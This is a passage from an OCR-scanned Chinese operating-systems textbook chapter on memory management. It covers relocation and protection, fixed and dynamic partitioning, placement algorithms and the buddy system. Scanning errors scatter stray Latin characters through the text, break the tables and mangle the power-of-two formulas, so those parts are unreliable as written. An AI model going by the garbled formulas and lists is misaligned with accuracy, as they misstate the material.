“用 户 ” 部 分 ， 以 满足 多 个 进程 的 要 求 。 细 分 的 任务 由 操作 系统 动态 完成 ， 这 称 为 内 存 管理 。 

有 效 的 内 存 管理 在 多 道 程序 设计 系统 中 是 至 关 重 要 的 。 如 果 只 有 少量 进程 在 内 存 中 , 所 有 进 
程 大 部 分 时 间 都 用 来 等 待 WO， 这 种 情况 下 ， 处 理 器 也 处 于 空闲 状态 。 因 此 ， 必 须 有 效 地 分 配 内 
存 来 保证 有 适当 数目 的 就 绪 进 程 可 以 占用 这 些 可 用 的 处 理 器 时 间 。 

本 章 首先 阐明 了 内 存 管 理 要 满足 的 需求 ,然后 通过 分 析 各 种 已 经 使 用 过 的 简单 方案 讲述 内 存 
管理 技术 。 程 序 开始 执行 前 ， 要 把 程序 装载 到 内 存 中 ， 系 统 所 需要 做 的 工作 是 本 章 分 析 的 重点 。 
这 些 讨 论说 明了 内 存 管理 的 一 些 基 本 原理 。 

表 7.1 介绍 了 一 些 我 们 要 讨论 的 关键 术语 。 


表 7.1 内 存 管理 术语 











内 存 中 一 个 固定 长 度 的 块 > | 

一 个 国定 长 度 的 数据 块 ， 储 存在 二 级 存储 器 中 ( 如 磁盘 )。 数 据 页 可 以 临时 复制 人 内 存 中 的 页 框 中 
一 个 变 长 的 数据 块 ， 储 存在 二 级 存储 器 中 。 整 个 段 可 以 临时 复制 到 内 存 的 一 个 可 用 区 域内 〔 分 段 )， 
或 者 可 以 将 一 个 段 分 为 许多 页 ， 将 每 页 单独 复制 到 内 存 中 ( 分 段 与 分 页 相 结 合 ) 


7.1 内 存 管理 的 需求 


当 研 究 与 内 存 管理 相关 的 各 种 机 制 和 策略 时 ， 清 楚 内 存 管 理 要 满足 的 需求 是 非常 有 用 的 。 
[ LIST93 ] 对 内 存 管理 提出 了 5 点 需求 : BEM, RP, RE, BAAR, WAR, 


7.1.1 Bet 


在 多 道 程序 设计 系统 中 , 可 用 的 内 存 空间 通常 被 多 个 进程 共享 。 通 常情 况 下 ,程序 员 并 不 能 
事先 知道 在 某 个 程序 执行 期 间 会 有 其 他 娜 些 程序 驻 贸 

在 内 存 中 。 此 外 还 希望 通过 提供 一 个 巨大 的 就 绪 进程 ver 

池 ， 能 够 把 活动 进程 换 人 或 换 出 内 存 ， 以 便 使 处 理 器 的 。 制 信息 ETA 
利用 率 最 大 化 。 一 旦 程序 被 换 出 到 磁盘 ， 当 下 一 次 被 换 






入 时 ， 如 果 必须 放 在 和 被 换 出 前 相同 的 内 存 区 域 ， ABZ 
这 将 会 是 一 个 很 大 的 限制 。 为 了 避免 这 种 限制 ， 我 们 需 A 
要 把 进程 重 定位 到 内 存 的 不 同 区 域 。 


因此 ， 我 们 事先 不 知道 程序 将 会 被 放置 到 哪个 区 
域 ， 并 且 我 们 需要 允许 程序 通过 交换 技术 在 内 存 中 移 
动 。 这 关系 到 一 些 与 寻 址 相关 的 技术 问题 ， 如 图 7.1 所 二 
示 。 该 图 描述 了 一 个 进程 映像 。 为 简单 起 见 ， 假 设 该 进 
程 映像 占据 了 内 存 中 的 一 段 相 邻 的 区 域 。 显 然 ， 操 作 系 
统 需 要 知道 进程 控制 信息 和 执行 栈 的 位 置 ， 以 及 该 进程 图 7.1 进程 在 寻 址 方面 的 需求 
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开始 执行 程序 的 人 口 点 。 由 于 操作 系统 管理 内 存 并 负责 把 进程 放 人 内 存 ， 因此 可 以 很 容易 地 访问 
到 这 些 地 址 。 此 外 , 处 理 器 必须 处 理 程 序 内 部 的 内 存 访问 。 跳 转 指令 包含 下 一 步 将 要 执行 的 指令 
的 地 址 , 数据 访问 指令 包含 被 访问 数据 的 字 节 或 字 的 地 址 。 处 理 器 硬件 和 操作 系统 软件 必须 能 够 
通过 某 种 方式 把 程序 代码 中 的 内 存 访问 转换 成 实际 的 物理 内 存 地 址 ,并 反映 程序 在 内 存 中 的 当前 
位 置 。 


7.1.2 保护 


每 个 进程 都 应 该 受到 保护 ,以 免 被 其 他 进程 有 意 或 无 意 地 干涉 。 因 此 , 该 进程 以 外 的 其 他 进 
程 中 的 程序 不 能 未 经 授权 地 访问 ( 进行 读 操作 或 写 操作 ) 该 进程 的 内 存单 元 。 在 某 种 意义 上 ， 要 
满足 重 定位 的 需求 增加 了 满足 保护 需求 的 难度 。 由 于 程序 在 内 存 中 的 位 置 是 不 可 预测 的 , 因而 在 
编译 时 不 可 能 检查 绝对 地 址 来 确保 保护 并且 大 多 数 程序 设计 语言 允许 在 运行 时 进行 地 址 的 动态 
计算 〈 例如， 通过 计算 数组 下 标 或 数据 结构 中 的 指针 )。 因 此 ， 必 须 在 运行 时 检查 进程 产生 的 所 
有 内 存 访 问 ,以 确保 它们 只 访问 了 分 配给 该 进程 的 存储 空间 。 幸 运 的 是 , 已 经 有 了 既 支 持 重 定位 
也 支持 保护 需求 的 机 制 。 

通常 ， 用户 进程 不 能 访问 操作 系统 的 任何 部 分 , 不 论 是 程序 还 是 数据 。 并 且 ， 一 个 进程 中 的 
程序 通常 不 能 跳 转 到 另 一 个 进程 中 的 指令 。 如 果 没 有 特别 的 许可 , 一 个 进程 中 的 程序 不 能 访问 其 
他 进程 的 数据 区 。 处 理 器 必须 能 够 在 执行 时 终止 这 样 的 指令 。 

注意 ,内 存 保 护 的 需求 必须 由 处 理 器 ( 硬件 ) 来 满足 ， 而 不 是 由 操作 系统 ( 软件 ) 满足 。 这 
是 因为 操作 系统 不 能 预测 程序 可 能 产生 的 所 有 内 存 访 问 ; 即使 可 以 预测 , 提前 审查 每 个 进程 中 可 
能 存在 的 内 存 违 法 访问 也 是 非常 费时 的 。 因 此 , 只 能 在 指令 访问 内 存 时 来 判断 这 个 内 存 访问 是 否 
违法 ( 存 取 数 据 或 跳 转 )。 为 实现 这 一 点 ， 处 理 器 硬件 必须 具有 这 个 能 力 。 


7.1.3 ”共享 


任何 保护 机 制 都 必须 具有 一 定 的 灵活 性 ,以 允许 多 个 进程 访问 内 存 的 同一 部 分 。 例 如， 如 果 
多 个 进程 正在 执行 同一 个 程序 , 则 允许 每 个 进程 访问 该 程序 的 同一 个 副本 要 比 让 每 个 进程 有 自己 
单独 的 副本 更 有 优势 。 合 作 完 成 同一 个 任务 的 进程 可 能 需要 共享 访问 相同 的 数据 结构 。 因 此 内 存 
管理 系统 必须 允许 对 内 存 共享 区 域 进行 受 控 访问 , 而 不 会 损害 基本 的 保护 。 我 们 将 会 看 到 用 于 支 
持 重 定位 的 机 制 也 支持 共享 。 


7.1.4 逻辑 组 织 


计算 机 系统 中 的 内 存 总 是 被 组 织 成 线性 的 (或 者 一 维 的 ) 地 址 空间 , 并 且 地 址 空间 是 由 一 系 
列 字 节 或 字 组 成 的 。 外 部 存储 器 ( 简称 外 存 ) 在 物理 层 上 也 是 按 类 似 方 式 组 织 的 。 尽管 这 种 组 织 
方式 类 似 于 实际 的 机 器 硬件 , 但 它 并 不 符合 程序 构造 的 典型 方法 。 大 多 数 程序 被 组 织 成 模块 ， 某 
些 模块 是 不 可 修改 的 〈 只 读 、 只 执行 )， 某 些 模 块 包含 可 以 修改 的 数据 。 如 果 操 作 系 统 和 计算 机 
硬件 能 够 有 效 地 处 理 以 某 种 模块 的 形式 组 织 的 用 户 程序 和 数据 ， 则 会 带 来 很 多 好 处 : 

1) 可 以 独立 地 编写 和 编译 模块 ， 系 统 在 运行 时 解析 从 一 个 模块 到 其 他 模块 的 所 有 引用 。 

2) 通过 适度 的 额外 开销 ， 可 以 给 不 同 的 模块 以 不 同 的 保护 级 别 《 只 读 、 只 执行 )。 

3) 可 以 引 人 某 种 机 制 ， 使 得 模块 可 以 被 多 个 进程 共享 。 在 模块 级 提供 共享 的 优点 在 于 它 符 

合用 户 看 待 问题 的 方式 ， 因 此 用 户 也 可 以 很 容易 地 指定 需要 的 共享 。 
最 易于 满足 这 些 需求 的 工具 是 分 段 ， 这 也 是 本 章 将 要 探讨 的 一 种 内 存 管理 技术 。 


7.1.5 ”物理 组 织 
正如 1.5 节 所 论述 的 ， 计 算 机 存储 器 至 少 要 被 组 织 成 两 级 ， 称 为 内 存 和 外 存 。 内 存 提供 快速 
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的 访问 , 成 本 也 相对 比较 高 。 并 且 内 存 是 易 失 性 的 , 也 就 是 说 , 它 不 能 提供 永久 存储 。 外 存 比 内 
存 慢 而 且 便 宜 , 它 通常 是 非 易 失 性 的 。 因 此 , 大 容量 的 外 存 可 以 用 于 长 期 存储 程序 和 数据 ， 而 较 
小 的 内 存 则 用 于 保存 当前 使 用 的 程序 和 数据 。 
在 这 种 两 级 方案 中 , 系统 主要 关注 的 是 内 存 和 外 存 之 间 信 息 流 的 组 织 。 可 以 让 程序 员 人 负责 组 
织 这 个 信息 流 , 但 由 于 以 下 两 方面 的 原因 ， 这 种 方式 是 不 切实 际 的 ， 也 是 不 合乎 要 求 的 : 
1 ) 可 供 程序 和 数据 使 用 的 内 存 可 能 不 足 。 在 这 种 情况 下 , 程序 员 必 须 采用 覆盖 (overlaying ) 
技术 来 组 织 程序 和 数据 。 不 同 的 模块 被 分 配 到 内 存 中 同一 块 区 域 ， 主 程序 负责 在 需要 时 
换 人 或 换 出 模块 。 即 使 有 编译 工具 的 帮助 , 覆盖 技术 的 实现 仍然 非常 浪费 程序 员 的 时 间 。 
2) 在 多 道 程 序 设 计 环境 中 ， 程 序 员 在 编写 代码 时 并 不 能 知道 可 用 空间 的 大 小 及 位 置 。 
GR, 在 两 级 存储 器 间 移 动 信息 的 任务 应 该 是 一 种 系统 责任 , 而 该 任务 恰恰 就 是 存储 管理 的 
本 质 所 在 。 


7.2 ”内 存 分 区 


内 存 管 理 最 基本 的 操作 是 由 处 理 器 把 程序 装 人 内 存 中 执行 。 在 大 部 分 现代 多 道 程序 设计 系 
统 中 , 这 往往 还 涉及 一 种 称 为 虚拟 内 存 的 精密 方案 。 虚拟 内 存 又 基于 分 段 和 分 页 这 两 种 基本 技术 
或 其 中 的 一 种 。 在 考虑 虚拟 内 存 技术 之 前 ， 先 考虑 一 些 不 涉及 虚拟 内 存 的 简单 技术 ( 表 7.2 总 结 
THREAD 8 章 中 分 析 到 的 全 部 技术 )。 其 中 分 区 技术 曾 用 于 许多 已 经 过 时 的 操作 系统 中 。 另 外 
两 种 技术 ， 简 单 分 页 和 简单 分 段 ， 并 未 在 实际 中 使 用 过 。 但 在 不 考虑 虚拟 内 存 的 前 提 下 ， 先 分 析 
这 两 种 技术 有 助 于 阐明 虚拟 内 存 的 概念 。 


表 7.2 内存 管理 技术 





















在 系统 生成 阶段 ， 内 存 被 划分 成 许多 静 
态 分 区 。 进 程 可 以 被 装 人 到 大 于 或 等 于 自 
身 大 小 的 分 区 中 
分 区 是 动态 创建 的 ， 因 而 使 得 每 个 进程 没有 内 部 碎片 ; 可 以 更 
可 以 被 装 人 与 自身 大 小 正好 相等 的 分 区 中 | 充分 地 使 用 内 存 
内 存 被 划分 成 许多 大 小 相等 的 页 框 ; 
每 个 进程 被 划分 成 许多 大 小 与 页 框 相等 
的 页 ; 要 装 人 进程 ， 需 要 把 进程 包含 的 没有 外 部 碎片 
所 有 页 都 装 人 到 内 存 中 不 一 定 连续 的 某 
些 页 框 中 
”每 个 进程 被 划分 成 许多 跨 ; BRAM 没有 内 部 碎片 ;相对 于 
程 ， 需 要 把 进程 包含 的 所 有 段 都 装 人 到 内 | 动态 分 区 ， 提 高 了 内 存 利 
存 中 不 一 定 连 续 的 某 些 动态 分 区 中 用 率 ， 减 少 了 开销 
除了 不 需要 装 人 进程 的 所 有 页 之 外 ,与 没有 外 部 碎片 ; 支持 更 
简单 分 页 一 样 ; 非 驻 留 页 在 以 后 需要 时 自 | 高 道 数 的 多 道 程序 设计 ; 
动 调 人 内 存 巨大 的 虚拟 地 址 空间 


除了 不 需要 装 人 进程 的 所 有 段 之 外 ,与 | ， 没 有 内 部 碎片 ; 支持 更 


动 调 入 内 存 ; 


持 保 护 和 共享 


由 于 有 内 部 碎片 ， 对 内 
存 的 使 用 不 充分 ; 活动 进 
程 的 最 大 数目 是 固定 的 

由 于 需要 压缩 外 部 碎 
片 ， 处 理 器 利用 率 低 


实现 简单 ， 只 需要 极 少 
的 操作 系统 开销 

















简单 分 页 有 少量 的 内 部 碎片 













存在 外 部 碎片 

















虚拟 内 存 分 页 复杂 的 内 存 管 理 开 销 



















虚拟 内 存 分 段 复杂 的 内 存 管理 开销 


7.2.1 固定 分 区 


在 大 多 数 内 存 管理 方案 中 , 可 以 假定 操作 系统 占据 了 内 存 中 的 某 些 固定 部 分 , 内 存 的 其 余部 
分 可 供 多 个 用 户 进程 使 用 。 管理 用 户 内 存 空 间 的 最 简单 的 方案 就 是 把 它 分 区 , 从 而 形成 若干 个 边 
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界 固定 的 区 域 。 
分 区 大 小 

图 7.2 的 例子 显示 了 固定 分 区 的 两 种 选择 。 一 种 是 使 用 大 小 相等 的 分 区 ， 在 这 种 情况 下 ， 小 
于 或 等 于 分 区 大 小 的 任何 进程 都 可 以 装 入 到 任何 可 用 的 分 区 中 。 如 果 所 有 的 分 区 都 满 了 , 并 且 没 
有 进程 处 于 就 绪 态 或 运行 态 , 则 操作 系统 可 以 换 出 一 个 进程 的 所 有 分 区 , 并 装 入 另 一 个 进程 ,使 
等 处 理 器 有 事 可 做 。 

使 用 大 小 相等 的 固定 分 区 有 两 个 难点 : 

© 程序 可 能 太 大 而 不 能 放 到 一 个 分 区 中 。 在 这 种 情况 下 ， 

程序 员 必 须 使 用 覆盖 技术 设计 程序 ， 使 得 在 任何 时 候 
该 程序 只 有 一 部 分 需要 放 到 内 存 中 。 当 需要 的 模块 不 
在 时 , 用 户 程序 必须 把 这 个 模块 装 和 到 程序 的 分 区 中 ， 
覆盖 掉 该 分 区 中 的 任何 程序 和 数据 。 

© 内 存 的 利用 率 非常 低 。 任 何 程序 ， 即 使 很 小 ， 都 需要 

占据 一 个 完整 的 分 区 。 在 图 7.2 所 示 的 例子 中 ， 假 设 
存在 一 个 长 度 小 于 2MB 的 程序 , ERRAR, 仍 占 
据 了 一 个 8MB 的 分 区 。 由 于 被 装 入 的 数据 块 小 于 分 区 
大 小 ， 从 而 导致 分 区 内 部 有 空间 浪费 ， 这 种 现象 称 为 
内 部 碎片 〈internal fragmentation )。 

可 以 通过 使 用 大 小 不 等 的 分 区 来 缓解 这 两 个 问题 ， 如 图 ee 2 
7.2b 所 示 , 但 不 能 完全 解决 这 两 个 问题 。 在 图 7.2b 的 例子 中 ， D 大 小 相等 的 分 区 b) 大 小 不 等 的 分 区 
可 以 容纳 大 小 为 16MB 的 程序 而 不 需要 覆盖 。 小 于 8MB 的 分 。 图 7.2 一 个 64MB 内 存 的 
区 可 用 来 容纳 更 小 的 程序 ， 以 产生 较 少 的 内 部 碎片 。 固定 分 区 的 例子 
放置 算法 

对 于 大 小 相等 的 分 区 策略 ,进程 在 内 存 中 的 放置 非常 简单 。 只 要 存在 可 用 的 分 区 ,进程 就 可 
以 装 入 分 区 。 由 于 所 有 的 分 区 大 小 相等 , 因而 使 用 哪个 分 区 都 没有 关系 。 如 果 所 有 的 分 区 都 被 处 
于 不 可 运行 状态 的 进程 所 占据 , 那么 这 些 进程 中 的 一 个 必须 被 换 出 ， 从 而 为 新 进程 让 出 空间 。 换 
出 哪 一 个 进程 属于 调度 问题 ， 相 关内 容 将 在 第 四 部 分 讨论 。 





新 到 
进程 ID 





a) 每 个 分 区 一 个 进程 队列 b) 一 个 队列 
73 ”固定 分 区 中 的 内 存 分 配 
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对 于 大 小 不 等 的 分 区 策略 , 有 两 种 方法 可 以 把 进程 分 配 到 分 区 。 最 简单 的 方法 是 把 每 个 进程 
分 配 到 能 够 容纳 它 的 最 小 分 区 ® 。 在 这 种 情况 下 ,每 个 分 区 都 需要 维护 一 个 调度 队列 ， 用 于 保存 
从 这 个 分 区 换 出 的 进程 ， 如 图 7.3a 所 示 。 这 种 方法 的 优点 是 : 如 果 所 有 进程 都 按 这 种 方式 分 配 ， 
可 以 使 每 个 分 区 内 部 浪费 的 空间 ( 内 部 碎片 ) 最 少 。 

尽管 从 单个 分 区 的 角度 来 看 这 种 技术 是 最 优 的 ， 但 从 整个 系统 来 看 它 却 不 是 最 佳 的 。 在 图 
7.2b 的 例子 中 , 考虑 这 样 的 情况 , 在 某 个 确定 的 时 刻 , 系统 中 没有 大 小 在 12~16MB 之 间 的 进程 。 
在 这 种 情况 下， 即使 系统 中 有 一 些 更 小 的 进程 本 可 以 分 配 到 16MB 的 分 区 中 ,但 16MB 的 分 区 
将 仍 会 保持 闲置 。 因 此 ， 一 种 更 可 取 的 方法 是 为 所 有 进程 只 提供 一 个 队列 ， 如 图 7.3b 所 示 。 当 
需要 把 一 个 进程 装 人 内 存 时 ， 选 择 可 以 容纳 该 进程 的 最 小 可 用 分 区 。 如 果 所 有 的 分 区 都 已 被 占 
E., 则 必须 进行 交换 。 一 般 优 先 考虑 换 出 能 容纳 新 进程 的 最 小 分 区 中 的 进程 ， 或 者 考虑 一 些 诸如 
优先 级 之 类 的 其 他 因素 ， 也 可 以 优先 选择 换 出 被 阻塞 的 进程 ， 而 不 是 就 绪 进 程 。 

使 用 大 小 不 等 的 分 区 为 固定 分 区 带 来 了 一 定 的 灵活 性 。 此 外 ， 固 定 分 区 方案 相对 比较 简单 ， 
只 需要 很 小 的 操作 系统 软件 和 处 理 开 销 。 但 是 它 也 存在 以 下 缺点 : 

@ 分 区 的 数目 在 系统 生成 阶段 已 经 确定 ， 它 限制 了 系统 中 活动 ( 没有 挂 起 ) 进程 的 数目 。 

o 由 于 分 区 的 大 小 是 在 系统 生成 阶段 事先 设置 的 ， 因 而 小 作业 不 能 有 效 地 利用 分 区 空间 。 

在 事先 知道 所 有 作业 的 内 存 需求 的 情况 下 ， 这 种 方法 也 许 是 合理 的 ， 但 大 多 数 情况 下 这 
种 技术 是 非常 低 效 的 。 

目前 几乎 已 经 没有 什么 场合 会 使 用 固定 分 区 的 方法 。 使 用 这 种 技术 的 一 个 成 功 的 操作 系统 例 
子 是 早期 的 IBM 主机 操作 系统 OS/MFT ( 具有 固定 任务 数 的 多 道 程序 设计 系统 ，Multiprogramming 
with a Fixed Number of Tasks )。 


7.2.2 ”动态 分 区 


为 了 克服 固定 分 区 的 一 些 缺 点 ， 又 出 现 了 一 种 动态 分 区 方法 。 同 样 ， 这 种 方法 也 已 经 被 很 多 
更 先进 的 内 存 管 理 技术 所 取代 。 使 用 该 技术 的 一 个 重要 的 操作 系统 是 IBM 主机 操作 系统 OS/MVT 
(具有 可 变 任 务 数 的 多 道 程序 设计 系统 ，Multiprogramming with a Variable Number of Tasks )。 

对 于 动态 分 区 , 分 区 长 度 和 数目 是 可 变 的 。 当 进 程 被 装 入 内 存 时 ,系统 会 给 它 分 配 一 块 和 它 
所 需 容量 完全 相等 的 内 存 空间 , 不 多 也 不 少 。 示例 如 图 7.4 所 示 , 它 使 用 64MB 的 内 存 。 一 开始 ， 
内 存 中 只 有 操作 系统 ， 如 图 7.4a 所 示 。 被 装 和 人 的 前 三 个 进程 从 操作 系统 结束 处 开始 ， 分 别 占据 
了 它们 各 自 所 需要 的 空间 大 小 ， 如 图 7.4b、 图 7.4c、 图 7.4d 所 示 ， 这 样 在 内 存 末尾 只 剩 下 了 一 
个 “ 洞 "， 而 这 个 “ 洞 ” 对 第 4 个 进程 来 说 就 太 小 了 。 在 某 个 时 刻 ， 内 存 中 没有 一 个 就 绪 进程 操 
作 系 统 换 出 进程 2， 如 图 7.4e 所 示 ， 这 便 为 装 人 一 个 新 进程 ( 即 进程 4 ) 让 出 了 足够 的 空间 ， 如 
图 7.4f 所 示 。 由 于 进程 4 比 进程 2 小， 就 产生 了 另外 一 个 小 “ 洞 ”。 然 后 ， 在 另外 一 个 时 刻 ， 内 
存 中 没有 一 个 进程 是 就 绪 的 , 但 处 于 就 绪 挂 起 状态 的 进程 2 是 可 用 的 。 由 于 内 存 中 没有 足够 的 空 3 
间 容 纳 进程 2， 操 作 系 统 换 出 进程 1， 如 图 7.4g 所 示 ， 然 后 换 人 进程 2， 如 图 7.4h 所 示 。 

正如 图 7.4 的 例子 所 示 ， 动 态 分 区 方法 在 开始 时 是 很 好 的 , 但 它 最 终 会 导致 在 内 存 中 出 现 许 
多 小 的 空洞 。 随 着 时 间 的 推移 ， 内 存 中 产生 了 越 来 越 多 的 碎片 ， 内 存 的 利用 率 随 之 下 降 。 这 种 现 
象 称 为 外 部 碎片 (external fragmentation ), 指 在 所 有 分 区 外 的 存储 空间 变 成 越 来 越 多 的 碎片 ， 这 
与 前 面 所 讲 的 内 部 碎片 正好 相对 。 

克服 外 部 碎片 的 一 种 技术 是 压缩 (compaction ): 操作 系统 不 时 地 移动 进程 ， 使 得 进程 占用 
的 空间 连续 , 并 且 所 有 空闲 空间 连 成 一 片 。 例 如 ,在 图 7.4h 中 ,压缩 将 会 产生 一 块 长 度 为 16MB 





O 这 里 假定 可 以 知道 一 个 进程 最 多 需要 的 内 存 大 小 ， 但 这 种 假定 很 难得 到 保证 。 如 果 不 知 道 一 个 进程 将 会 变 得 
多 大 ,那么 唯一 可 行 的 替代 方案 就 只 能 是 使 用 覆盖 技术 或 者 虚拟 内 存 技术 了 。 
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的 空闲 内 存 空间 , 足以 装 人 另 一 个 进程 。 压 缩 的 困难 在 于 它 是 一 个 非常 费时 的 过 程 , 并 且 浪费 了 
处 理 器 时 间 。 注 意 , 压缩 需要 动态 重 定位 的 能 力 。 也 就 是 说 ， 必 须 能 够 把 程序 从 内 存 的 一 块 区 域 
移动 到 另 一 块 区 域 ， 而 不 会 使 程序 中 的 内 存 访问 无 效 ( 见 附录 7A )。 





74 动态 分 区 的 效果 


放置 算法 

由 于 内 存 压 缩 非常 费时 , 因而 操作 系统 需要 巧妙 地 把 进程 分 配 到 内 存 中 , 塞 住 内 存 中 的 那些 
“ 洞 "。 当 把 一 个 进程 装 和 或 换 和 内存 时 ,如 果 内 存 中 有 多 个 足够 大 的 空闲 块 ， 则 操作 系统 必须 确 
定 要 为 此 进程 分 配 哪 个 空闲 块 。 

可 供 考虑 的 有 三 种 放置 算法 : 最 佳 适 配 、 首 次 适 配 和 下 次 适 配 。 这 三 种 算法 都 是 在 内 存 中 选 
择 等 于 或 大 于 该 进程 的 空闲 块 。 差 别 在 于 : 最 佳 适 配 选 择 与 要 求 的 大 小 最 接近 的 块 ; 首次 适 配 从 
头 开 始 扫描 内 存 ， 选 择 大 小 足够 的 第 一 个 可 用 块 ; 下 次 适 配 从 上 一 次 放置 的 位 置 开 始 扫描 内 存 ， 
选择 下 一 个 大 小 足够 的 可 用 块 。 

图 7.5a 给 出 了 经 过 多 次 放置 和 换 出 操作 之 后 内 存 配置 的 例子 。 前 一 次 操作 在 一 个 22MB .的 
块 中 创建 了 一 个 14MB 的 分 区 。 图 7.5b 给 出 了 为 满足 一 个 16MB 的 分 配 请 求 ， 使 用 最 佳 适 配 、 
首次 适 配 和 下 次 适 配 三 种 放置 算法 的 区 别 。 最 佳 适 配 查找 所 有 的 可 用 块 列表 ， 最 后 使 用 了 一 个 
18MB Wik, APT 2MB 的 碎片 ; 首次 适 配 产生 了 一 个 6MB 的 碎片 ; 下 次 适 配 产生 了 一 个 20MB 
的 碎片 。 

各 种 方法 的 好 坏 取决 于 发 生 进程 交换 的 次 序 以 及 这 些 进程 的 大 小 。 但 是 , 还 可 以 得 出 一 些 一 
般 性 的 结论 ( 见 [ BREN89 J, [ SHOR75 ] 和 [ BAYS77 ])。 首 次 适 配 算法 不 仅 是 最 简单 的 ， 而且 
通常 也 是 最 好 和 最 快 的 。 下 次 适 配 算法 通常 比 首次 适 配 的 结果 要 差 , 它 常常 会 导致 在 内 存 的 末尾 
分 配 空间 , 导致 的 结果 是 通常 位 于 存储 空间 末尾 的 最 大 空闲 存储 块 很 快 被 分 裂 成 小 碎片 。 因 此 使 
用 下 次 适 配 算 法 可 能 需要 更 多 次 数 的 压缩 。 另 一 方面 , 首次 适 配 算法 会 使 得 内 存 的 前 端 出 现 很 多 
小 的 空闲 分 区 , 并 且 每 当 进 行 首 次 适 配 查找 时 ， 都 要 经 过 这 些 分 区 。 最 佳 适 配 算法 尽管 称 为 “最 
TE”, 但 通常 性 能 却 是 最 差 的 。 这 个 算法 需要 查找 满足 要 求 的 最 小 块 ， 因 而 它 可 能 保证 产生 的 碎 
片 尽 可 能 地 小 。 尽管 每 次 存储 请 求 总 是 浪费 最 小 的 存储 空间 , 但 结果 却 使 得 内 存 中 很 快 产生 许多 
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很 小 的 块 , 这 些 块 通常 很 小 以 至 于 不 能 满足 任何 内 存 分 配 请 求 。 因 此 , 它 比 其 他 算法 需要 更 经 常 
地 进行 内 存 压缩 。 


8MB 8MB 
12MB 首次 适 配 12MB 
22MB 
MB 
最 佳 适 配 
最 后 分 配 的 18MB 
块 (14KB) 
8MB 8MB 
6MB 6MB 
国 己 分 配 的 块 
CZAR 
14MB 国 可 能 的 新 分 配 14MB 
邻近 适 配 
36MB 
20MB 
a) 操作 之 前 b) 操作 之 后 


图 7.5 分 配 一 个 16MB 的 块 的 操作 之 前 和 之 后 的 内 存 配 置 


置换 算法 

在 使 用 动态 分 区 的 多 道 程序 设计 系统 中 , 有 时 候 会 出 现 内 存 中 的 所 有 进程 都 处 于 阻塞 态 , 并 
且 即 使 进行 了 压缩 , 对 一 个 新 的 进程 仍 没 有 足够 的 内 存 空间 。 为 避免 由 于 等 待 一 个 活动 进程 解除 
阻塞 状态 引起 的 处 理 器 时 间 浪 费 , 操作 系统 将 把 一 个 阻塞 的 进程 换 出 内 存 , 给 新 进程 或 处 于 就 
绪 - 挂 起 态 的 进程 让 出 空间 。 因 此 ， 操 作 系统 必须 选择 要 替换 哪个 进程 。 由 于 置换 算法 的 一 些 细 
节 涉 及 了 各 种 虚拟 内 存 方案 ， 因 此 将 在 讨论 虚拟 内 存 方 案 时 再 讨论 置换 算法 的 细节 。 


7.2.3 ”伙伴 系统 


周 定 分 区 和 动态 分 区 方案 都 有 缺陷 。 固定 分 区 方案 限制 了 活动 进程 的 数目 , 并 且 如 果 可 用 分 
区 的 大 小 与 进程 大 小 非常 不 匹配 , 则 内 存 空 间 的 利用 率 非常 低 。 动态 分 区 的 维护 特别 复杂 , 并且 
引信 了 进行 压缩 的 额外 开销 。 一 种 更 有 吸引 力 的 折 中 方案 是 伙伴 系统 ([ KNUT97 ]、[ PETE77 ])。 
在 伙伴 系统 中 ， 可 用 内 存 块 的 大 小 为 2 个 字 , L <K<U， 
其 中 ， 
2 表示 分 配 的 最 小 块 的 尺寸 
2 表示 分 配 的 最 大 块 的 尺寸 通常 2” 是 可 供 分 配 的 整个 内 存 的 大 小 
开始 时 , 可 用 于 分 配 的 整个 空间 被 看 做 是 一 个 大 小 为 2” 的 块 。 如 果 请 求 的 大 小 s 满足 2” <s 
<2"， 则 分 配 整 个 空间 。 否 则 ， 该 块 被 分 成 两 个 大 小 相等 的 伙伴 ， 大 小 均 为 2"”'。 如 果 有 2” “<s 
<2“: ， 则 给 该 请 求 分 配 两 个 伙伴 中 的 任何 一 个 ; 否则 ， 其 中 的 一 个 伙伴 又 被 分 成 两 半 。 这 个 过 
程 一 直 继 续 直 到 产生 大 于 或 等 于 s 的 最 小 块 ， 并 分 配给 该 请 求 。 在 任何 时 候 , 伙伴 系统 中 为 所 有 
大 小 为 2 的 “ 洞 ” 维 护 着 一 个 列表 。 一 个 洞 可 以 通过 对 半分 型 从 〈 寺 1) 列表 中 移出 ， 并 在 i 列 
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表 中 产生 两 个 大 小 为 2' 的 伙伴 。 当 i 列表 中 的 一 对 伙伴 都 变 成 未 分 配 的 块 时 , 它们 从 该 i 列表 中 
移出 ,合并 成 (it1 ) 列表 中 的 一 个 块 。 请 求 一 个 大 小 为 上 的 块 并 且 上 满足 2"!<k<2! 时 ， 可 使 用 
下 面 的 递归 算法 ([ LIST93 ]) 找到 一 个 大 小 为 2' 的 洞 : 


void get_hole(int i) 


if (i == (U + 1)) «<failure>; 
if (<i list empty>) { 
get_hole(i + 1); 
<split hole into buddies>; 
<put buddies on i list>; 


} 


}<take first hole on i_list>; 


} 

图 7.6 给 出 了 一 个 初始 大 小 为 IMB 的 块 例子 。 第 一 个 请 求 A 为 100KB ， 需 要 一 个 128KB 
的 块 。 最 初 的 块 被 划分 成 两 个 512KB 的 伙伴 ， 第 一 个 又 被 划分 成 两 个 256KB 的 伙伴 ， 并 且 其 
中 的 第 一 个 又 划分 成 两 个 128KB 的 伙伴 ,这 两 个 128KB 的 伙伴 中 的 一 个 分 配给 A。 下 一 个 请 求 
B 需要 256KB 的 块 ， 因 为 已 经 有 这 样 的 一 个 块 ， 随 即 分 配给 它 。 在 需要 时 ， 这 个 分 裂 和 合并 的 
过 程 继续 进行 。 注 意 ， 当 EE 被 释放 时 两 个 128KB 的 伙伴 合并 成 一 个 256KB 的 块 ， 这 个 256KB 的 
块 又 立即 与 它 的 伙伴 合并 成 一 个 512KB 的 块 。 

7.7 给 出 了 一 个 表示 当 释 放 B 的 请 求 后 的 伙伴 系统 分 配 情 况 的 二 叉 树 。 叶 节点 表示 内 存 
中 的 当前 分 区 ， 如 果 两 个 伙伴 都 是 叶 节点 ， 则 至 少 有 一 个 必须 已 经 被 分 配 出 去 了 ， 否 则 它们 将 
合并 成 一 个 更 大 的 块 。 

伙伴 系统 是 一 个 合理 的 折 中 方案 , 它 克 服 了 固定 分 区 和 可 变 分 区 方案 的 缺陷 。 但 在 当前 的 操 
作 系 统 中 ， 基 于 分 页 和 分 段 机 制 的 虚拟 内 存 更 先进 。 然 而 ， 伙 伴 系统 在 并 行 系统 中 有 很 多 应 用 ， 
